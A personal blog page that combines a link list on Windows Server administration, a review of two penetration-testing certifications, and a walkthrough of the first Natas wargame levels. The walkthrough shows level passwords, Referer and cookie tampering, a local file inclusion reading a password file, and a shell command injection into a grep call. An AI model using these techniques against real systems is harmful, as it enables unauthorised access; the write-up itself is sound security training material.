Pages

Tuesday 10 October 2017

Microsoft Infrastructure Foundamentals

Some references I gathered over time on Microsoft Windows Administration.

Happy reading,
Yuriy

Server Limits Specifications:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx#physical_memory_limits_windows_server_2012

Logical CPU Limits:
https://blogs.technet.microsoft.com/matthts/2012/10/13/windows-server-sockets-logical-processors-symmetric-multi-threading/

Windows Server Comparison:
https://www.thomas-krenn.com/en/wiki/Windows_Server_2012_Editions_comparison


Articles:
Default gateways
https://technet.microsoft.com/en-us/library/cc779696(v=ws.10).aspx

DNSSEC:
https://technet.microsoft.com/en-us/library/jj200221.aspx

DNS Records:
https://technet.microsoft.com/en-us/library/cc958958.aspx

Domains:
https://technet.microsoft.com/en-us/library/cc780856(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/bb629410.aspx
https://technet.microsoft.com/en-us/library/dd197461
https://technet.microsoft.com/en-us/library/cc780661
https://technet.microsoft.com/en-us/library/cc730756
https://technet.microsoft.com/en-us/library/cc754345.aspx
https://technet.microsoft.com/en-us/library/cc725590.aspx
https://technet.microsoft.com/en-us/library/cc771255(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc755131.aspx
https://technet.microsoft.com/en-us/library/ee683907(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc753579.aspx

Zones:
https://technet.microsoft.com/en-us/library/cc771898.aspx
https://technet.microsoft.com/en-us/library/cc816885(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779197(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649181(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc775397(v=ws.10).aspx

Cache Locking:
https://technet.microsoft.com/en-us/library/ee649148(v=ws.10).aspx

IP Addreses:
https://technet.microsoft.com/en-us/library/cc958825.aspx
https://technet.microsoft.com/en-us/library/bb726995.aspx
https://technet.microsoft.com/en-us/library/cc958834.aspx
https://technet.microsoft.com/en-us/library/cc940018.aspx

DHCP:
https://technet.microsoft.com/en-us/library/cc738472(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc783103(WS.10).aspx
https://technet.microsoft.com/en-us/library/hh831825.aspx
https://technet.microsoft.com/en-us/library/cc958946.aspx
https://technet.microsoft.com/en-us/library/cc958935.aspx
http://www.tcpipguide.com/free/t_DHCPLeaseRenewalandRebindingProcesses-2.htm
http://www.thenetworkencyclopedia.com/entry/dynamic-host-configuration-protocol-dhcp/
https://technet.microsoft.com/en-us/library/cc779610(v=ws.10).aspx

What Are Domains and Forests?
https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx

Active Directory Administrative Center: Getting Started:
https://technet.microsoft.com/en-us/library/dd560651(v=ws.10).aspx

Understanding Sites, Subnets, and Site Links:
https://technet.microsoft.com/en-us/library/cc754697.aspx

Privileged Access Management for Active Directory Domain Services:
https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services

Install and Deploy Windows Server 2012 R2 and Windows Server 2012:
https://technet.microsoft.com/en-us/library/hh831620.aspx

Migrating Roles and Features in Windows Server:
https://technet.microsoft.com/en-us/windowsserver/jj554790.aspx

Linking GPOs to Active Directory Containers:
https://msdn.microsoft.com/en-us/library/aa374339(v=vs.85).aspx

Designing OU Structures that Work:
https://technet.microsoft.com/en-us/magazine/2008.05.oudesign.aspx

Active Directory Best Practice: OUs and Containers:
http://www.trivalentgroup.com/2015/11/active-directory-best-practice-ous-and-containers/

Active Directory Schema Tools and Settings
https://technet.microsoft.com/en-us/library/cc757747(v=ws.10).aspx

What Is the Global Catalog?
https://technet.microsoft.com/en-us/library/cc728188(v=ws.10).aspx

What Is the Active Directory Schema?
https://technet.microsoft.com/en-us/library/cc784826(v=ws.10).aspx

Resets the Directory Services Restore Mode (DSRM) password
https://technet.microsoft.com/en-us/library/cc754363(v=ws.11).aspx

Performing an Authoritative Restore:
https://technet.microsoft.com/en-us/library/cc940334.aspx

Performing a Nonauthoritative Restore of a Domain Controller
https://technet.microsoft.com/en-us/library/cc784922(v=ws.10).aspx

Understanding Trusts:
https://technet.microsoft.com/en-us/library/cc736874(v=ws.10).aspx

Ntdsutil
https://technet.microsoft.com/en-us/library/cc753343.aspx

Server Manager Technical Overview:
https://technet.microsoft.com/en-us/library/cc753319.aspx

Managing Windows Server 2012 and Windows Server 2012 R2 with Remote Server Administration Tools:
https://blogs.technet.microsoft.com/ausoemteam/2015/03/21/managing-windows-server-2012-and-windows-server-2012-r2-with-remote-server-administration-tools/

Recovering Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816751(v=ws.10).aspx

Requirements for Active Directory Recycle Bin:
https://technet.microsoft.com/en-us/library/dd379484(v=ws.10).aspx

Active Directory Recycle Bin Step-by-Step Guide:
https://technet.microsoft.com/en-us/library/dd392261(v=ws.10).aspx

Group types:
https://technet.microsoft.com/en-us/library/cc781446(v=ws.10).aspx

Default groups:
https://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx

Nesting groups:
https://technet.microsoft.com/en-us/library/cc776499(v=ws.10).aspx

Active Directory Security Groups:
https://technet.microsoft.com/en-us/library/dn579255(v=ws.11).aspx

Managing Computers:
https://technet.microsoft.com/en-us/library/cc771682.aspx

Detailed Concepts: Secure Channel Explained
http://social.technet.microsoft.com/wiki/contents/articles/24644.detailed-concepts-secure-channel-explained.aspx

Group Policy Overview
https://technet.microsoft.com/en-us/library/hh831791.aspx

Performance Team Blog:
https://blogs.technet.microsoft.com/askperf/

SMB:
https://blogs.technet.microsoft.com/josebda/2013/10/02/windows-server-2012-r2-which-version-of-the-smb-protocol-smb-1-0-smb-2-0-smb-2-1-smb-3-0-or-smb-3-02-are-you-using/

Bitlocker:
https://technet.microsoft.com/en-us/library/cc766200%28v=ws.10%29.aspx

https://technet.microsoft.com/en-us/library/cc732774.aspx

https://technet.microsoft.com/en-us/library/jj679890.aspx

Storage Technologies:
https://technet.microsoft.com/en-us/library/dn610883.aspx
https://technet.microsoft.com/en-us/library/hh831739.aspx
https://blogs.technet.microsoft.com/josebda/2014/11/19/storage-spaces-survival-guide-links-to-presentations-articles-blogs-tools/
https://technet.microsoft.com/windows-server-docs/storage/storage-spaces/storage-spaces-direct-windows-server-2016
https://blogs.technet.microsoft.com/askpfeplat/2012/10/10/windows-server-2012-storage-spaces-is-it-for-you-could-be/
https://technet.microsoft.com/windows-server-docs/storage/software-defined-storage/storage-quality-of-service
https://technet.microsoft.com/en-us/library/hh831602.aspx


Hands on:

Deduplication:
https://blogs.technet.microsoft.com/canitpro/2013/04/29/step-by-step-enabling-data-deduplication-on-windows-server-2012-volumes/

iSCSI:
https://blogs.technet.microsoft.com/filecab/2012/05/21/introduction-of-iscsi-target-in-windows-server-2012/

Bitlocker:
http://accc.uic.edu/answer/how-do-i-configure-active-directory-store-bitlocker-recovery-information

DHCP:
https://technet.microsoft.com/en-us/library/cc732075.aspx
https://technet.microsoft.com/en-us/library/cc757682(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779507(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/dn425039.aspx
https://technet.microsoft.com/en-us/library/cc786474(v=ws.10).aspx
https://blogs.technet.microsoft.com/teamdhcp/2009/01/22/how-to-configure-split-scope-using-wizard/
https://blogs.technet.microsoft.com/teamdhcp/2012/09/03/dhcp-failover-hot-standby-mode/
http://www.serverlab.ca/tutorials/windows/network-services-windows/step-step-creating-windows-server-dhcp-scope/
https://technet.microsoft.com/en-us/library/dd759168(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

DNS:
https://technet.microsoft.com/en-us/library/cc754941
https://blogs.technet.microsoft.com/networking/2008/03/19/dont-be-afraid-of-dns-scavenging-just-be-patient/
https://technet.microsoft.com/en-us/library/ff807360(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc816657(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649174(v=ws.10).aspx

Storage Spaces: How to configure Storage Tiers with Windows Server 2012 R2:
https://blogs.technet.microsoft.com/askpfeplat/2013/10/20/storage-spaces-how-to-configure-storage-tiers-with-windows-server-2012-r2/

Installing and Configuring MPIO:
https://technet.microsoft.com/en-us/library/ee619752(v=ws.10).aspx

Installing and Configuring Microsoft iSCSI Initiator:
https://technet.microsoft.com/en-us/library/ee338480(v=ws.10).aspx

Switch between Full and Server Core in Windows Server 2012 using PowerShell 3.0:
https://blogs.technet.microsoft.com/puneetvig/2012/10/15/switch-between-full-and-server-core-in-windows-server-2012-using-powershell-3-0/

How to change default OU for computers in AD:
https://blogs.technet.microsoft.com/canitpro/

Install a New Windows Server 2012 Active Directory Child or Tree Domain (Level 200):
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/deploy/install-a-new-windows-server-2012-active-directory-child-or-tree-domain--level-200-

http://pc-addicts.com/server-2012-change-default-ou/

Step-by-Step: Enabling and Using Fine-Grained Password Policies in AD
https://blogs.technet.microsoft.com/canitpro/2013/05/29/step-by-step-enabling-and-using-fine-grained-password-policies-in-ad/

How To Enable the Active Directory Recycle Bin:
https://redmondmag.com/articles/2015/11/11/enable-the-active-directory-recycle-bin.aspx

Step-By-Step: Setting Up Active Directory Sites, Subnets & Site-Links
https://blogs.technet.microsoft.com/canitpro/2015/03/03/step-by-step-setting-up-active-directory-sites-subnets-site-links/

Getting Started with Nano Server:
https://technet.microsoft.com/windows-server-docs/compute/nano-server/getting-started-with-nano-server

Get started with Setup and Boot Event Collection
https://technet.microsoft.com/windows-server-docs/compute/get-started-with-setup-and-boot-event-collection

Evaluation:
https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012?wt.mc_id=DXLEX_EDX_INF500x

ADSI Edit (adsiedit.msc)
https://technet.microsoft.com/en-us/library/cc773354(v=ws.10).aspx

Remote Server Administration Tools for Windows 10

How to Install Service Manager on a Single Computer
https://technet.microsoft.com/en-us/library/hh519747(v=sc.12).aspx

Promoting DC:
https://www.interworks.com/blog/ijahanshahi/2014/01/06/promoting-windows-2012r2-server-domain-controller

Configure Remote Desktop Access on Windows 7 Systems:
https://technet.microsoft.com/en-us/magazine/ff404238.aspx

Special Identities
https://technet.microsoft.com/en-us/library/dn617202.aspx

PS AD DS:
https://technet.microsoft.com/en-us/library/hh852274(v=wps.630).aspx

Use the Wbadmin Backup Command Line Utility in Windows Server 2008:
https://technet.microsoft.com/en-us/magazine/dd767786.aspx

Backing Up Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816584(v=ws.10).aspx

Offline Domain Join (Djoin.exe) Step-by-Step Guide
https://technet.microsoft.com/en-us/library/offline-domain-join-djoin-step-by-step(v=ws.10).aspx

Delegate Permissions for Group Policy
https://technet.microsoft.com/en-us/library/dn789195.aspx

Create a new organizational unit
https://technet.microsoft.com/en-us/library/cc785077(v=ws.10).aspx

Creating the Security Group
https://technet.microsoft.com/en-us/library/cc732782(v=ws.10).aspx

Creating Roaming Profiles:
http://www.grouppolicy.biz/2010/08/best-practice-roaming-profiles-and-folder-redirection-a-k-a-user-virtualization/

Power-shell stuff:
https://technet.microsoft.com/en-us/library/ee617253.aspx
https://technet.microsoft.com/en-us/library/ee617258.aspx
https://technet.microsoft.com/en-us/library/ee617210.aspx
https://technet.microsoft.com/en-us/library/ee617245.aspx
https://technet.microsoft.com/en-us/library/jj574143.aspx
https://technet.microsoft.com/en-us/library/jj612821(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh826098(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj612803%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh826099%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh848689(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh848686(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh831434.aspx
https://technet.microsoft.com/en-us/library/hh848450.aspx
https://technet.microsoft.com/en-us/library/hh831700.aspx
https://technet.microsoft.com/windows-server-docs/networking/dns/what-s-new-in-dns-server
https://technet.microsoft.com/en-us/library/jj590751(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj590743(v=wps.630).aspx

Thursday 3 August 2017

Review eLearnSecurity eJPT, eCPPT

Currently I have been holding some penetration testing certifications from eLearnSecurity and passed them:
  • eJPT
  • eCPPT


I would like to share my experience here. 

About the labs, the labs they are quite different in approach compared to other certifications - the orientation is to skills rather to CTF targets. Personally I found it better choice since you learn quite a lot in a very short time (if you are dedicated). Not having free time - my only option was to learn in early morning 6 am to 8 am. After holding the  eJPT I was able to pass also the eCPPT within a month.

Most important takeaways during the learning process:
- Do all the labs.
- Try to automate tasks and repeat the labs with the automated tools you have created.
- Know the flaws of your tools.
- Document everything and be organized.
- Read.
- Advance.

Labs

During the labs I found that some of the tools I use have changed in time, to be specific Metasploit. There are lots of online resources regarding Metasploit so this is not a big issue, but it will waste your time if you have not done you research. For example I was really surprised that some windows post exploitation tools are not supported anymore. So do you research in advance. Also try to understand how it can be done manually - for instance X tool does not work, as a work around I can export registry key Y, decrypt password Z etc. 

"This lab does not work as expected" - Find the reason why. This might happen and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment and understand how the attack works - locally, recreation of situations helps a lot to understand the circumstances you are dealing with and in most cases it can be just a setting you have overlooked.

Knowledge domains

In a nutshell eJPT gives you the ground knowledge, eCPPT is a deep-dive into the penetration testing world and also you get to practice "Exploit Development" - which itself is a huge knowledge domain. Pivoting is also a technique you have to master it is widely used and also will be of great advantage for yourself - you have to know, how you can "move" between networks. All topics are widely covered both theoretically and practically, my advice would be to take the practical part more seriously.

As they state: 

eJPT:
  • Good knowledge of TCP/IP
  • Good knowledge of IP routing
  • Good knowledge of LAN protocols and devices
  • Good knowledge of HTTP and web techologies
  • Essential penetration testing processes and methodologies
  • Basic Vulnerability Assessment of Networks
  • Basic Vulnerability Assessment of Web Applications
  • Exploitation with Metasploit
  • Simple Web application Manual exploitation
  • Basic Information Gathering and Reconnaissance
  • Simple Scanning and Profiling the target
                    eCPPT:
                    • Penetration testing processes and methodologies
                    • Vulnerability Assessment of Networks
                    • Vulnerability Assessment of Web Applications
                    • Advanced Exploitation with Metasploit
                    • Performing Attacks in Pivoting
                    • Web application Manual exploitation
                    • Information Gathering and Reconnaissance
                    • Scanning and Profiling the target
                    • Privilege escalation and Persistence
                    • Exploit Development
                    • Advanced Reporting skills and Remediation



                    Exams

                    Surprisingly fun, have not had that much fun in years. If you have done the labs you can not go wrong. If you have issues during the lab you can reset it, but remember that you will have to re-exploit all of your targets - automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT as far as I remember 3 days for my criteria 24 h for this level is more than enough. eCCPT the exam was really interesting I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you will get to test your learned skills, so again do the labs - properly.

                    About the penetration testing report for eCCPT. The report is the most interesting part - you will have to organize all of your information and prepare a detailed analysis, it is best to get it done manually if you want to have a good report and pass the exam.

                    Tools

                    You are not limited in any way.

                    References:



                    Thursday 19 January 2017

                    Natas Level 0 to 10

                    This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of  Natas Level 0 to 10:
                    http://overthewire.org/wargames/natas/

                    L 0

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
                    <body>
                    <h1>natas0</h1>
                    <div id="content">
                    You can find the password for the next level on this page.

                    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
                    </div>
                    </body>
                    </html>

                     L1
                     Chrome -> Ctrl+U
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
                    <body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
                    <h1>natas1</h1>
                    <div id="content">
                    You can find the password for the
                    next level on this page, but rightclicking has been blocked!

                    <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
                    </div>
                    </body>
                    </html>

                    L2
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
                    <body>
                    <h1>natas2</h1>
                    <div id="content">
                    There is nothing on this page
                    <img src="files/pixel.png">
                    </div>
                    </body></html>

                    http://natas.labs.overthewire.org/js/wechall-data.js
                    var wechalldata = {
                        "natas0": 1,
                        "natas1": 2,
                        "natas2": 3,
                        "natas3": 4,
                        "natas4": 5,
                        "natas5": 6,
                        "natas6": 7,
                        "natas7": 8,
                        "natas8": 15,
                        "natas9": 14,
                        "natas10": 13,
                        "natas11": 12,
                        "natas12": 11,
                        "natas13": 10,
                        "natas14": 9,
                        "natas15": 16,
                        "natas16": 17,
                        "natas17": 18,
                        "natas18": 137,
                        "natas19": 138,
                        "natas20": 139,
                        "natas21": 140,
                        "natas22": 141,
                        "natas23": 142,
                        "natas24": 213,
                        "natas25": 214,
                        "natas26": 215,
                        "natas27": 216
                    }

                    http://natas2.natas.labs.overthewire.org/files/
                    [IMG] pixel.png 2016-06-25 11:58 303
                    [TXT] users.txt 2016-06-25 12:42 145

                    # username:password
                    alice:BYNdCesZqW
                    bob:jw2ueICLvT
                    charlie:G5vCxkVV3m
                    natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
                    eve:zo4mJWyNj2
                    mallory:9urtcpzBmH


                    L3:
                    User-agent: *
                    Disallow: /s3cr3t/

                    http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
                    natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

                    L4:
                    Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

                    Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

                    L5:
                    GET / HTTP/1.1
                    Host: natas5.natas.labs.overthewire.org
                    Cache-Control: max-age=0
                    Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, sdch
                    Accept-Language: bg,en-US;q=0.8,en;q=0.6
                    Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
                    DNT: 1
                    Connection: close

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
                    <body>
                    <h1>natas5</h1>
                    <div id="content">
                    Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
                    </body>
                    </html>

                    L6:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas6</h1>
                    <div id="content">

                    <?

                    include "includes/secret.inc";

                        if(array_key_exists("submit", $_POST)) {
                            if($secret == $_POST['secret']) {
                            print "Access granted. The password for natas7 is <censored>";
                        } else {
                            print "Wrong secret";
                        }
                        }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    http://natas6.natas.labs.overthewire.org/includes/secret.inc
                    <?
                    $secret = "FOEIUWGHFEEUHOFUOIU";
                    ?>

                    Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

                    L7:

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
                    <body>
                    <h1>natas7</h1>
                    <div id="content">

                    <a href="index.php?page=home">Home</a>
                    <a href="index.php?page=about">About</a>
                    <br>
                    <br>

                    <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
                    </div>
                    </body>
                    </html>

                    http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
                    DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

                    L8:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas8</h1>
                    <div id="content">

                    <?

                    $encodedSecret = "3d3d516343746d4d6d6c315669563362";

                    function encodeSecret($secret) {
                        return bin2hex(strrev(base64_encode($secret)));
                    }

                    if(array_key_exists("submit", $_POST)) {
                        if(encodeSecret($_POST['secret']) == $encodedSecret) {
                        print "Access granted. The password for natas9 is <censored>";
                        } else {
                        print "Wrong secret";
                        }
                    }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

                     oubWYf2kBq

                     Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl


                     L9:
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        passthru("grep -i $key dictionary.txt");
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                     http://natas9.natas.labs.overthewire.org/dictionary.txt

                     test; ls -la ../
                     Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../:
                    total 156
                    drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
                    drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
                    drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
                    drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
                    drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
                    drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
                    drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
                    drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
                    drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
                    drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
                    drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
                    drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
                    drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
                    drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
                    drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
                    drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
                    drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
                    drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
                    drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
                    drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
                    drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
                    drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
                    drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
                    drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
                    drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
                    drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
                    drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
